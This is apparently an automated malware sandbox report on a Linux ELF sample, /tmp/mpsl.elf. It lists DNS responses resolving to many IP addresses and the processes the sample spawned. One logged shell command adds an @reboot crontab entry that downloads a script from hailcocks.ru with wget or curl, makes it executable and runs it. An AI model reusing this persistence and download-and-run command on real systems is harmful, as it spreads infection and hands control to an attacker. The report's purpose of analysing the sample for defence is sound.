Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:54.840143919 CEST | 202.61.197.122 | 192.168.2.23 | 0xa56f | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:00.899835110 CEST | 168.235.111.72 | 192.168.2.23 | 0x8af0 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:28:06.542402029 CEST | 194.36.144.87 | 192.168.2.23 | 0x6085 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | /tmp/mpsl.elf |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | - |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | - |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | - |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | - |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | - |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |
Start time (UTC): | 12:27:47 |
Start date (UTC): | 24/10/2024 |
Path: | /tmp/mpsl.elf |
Arguments: | - |
File size: | 5773336 bytes |
MD5 hash: | 0d6f61f82cf2f781c6eb0661071d42d9 |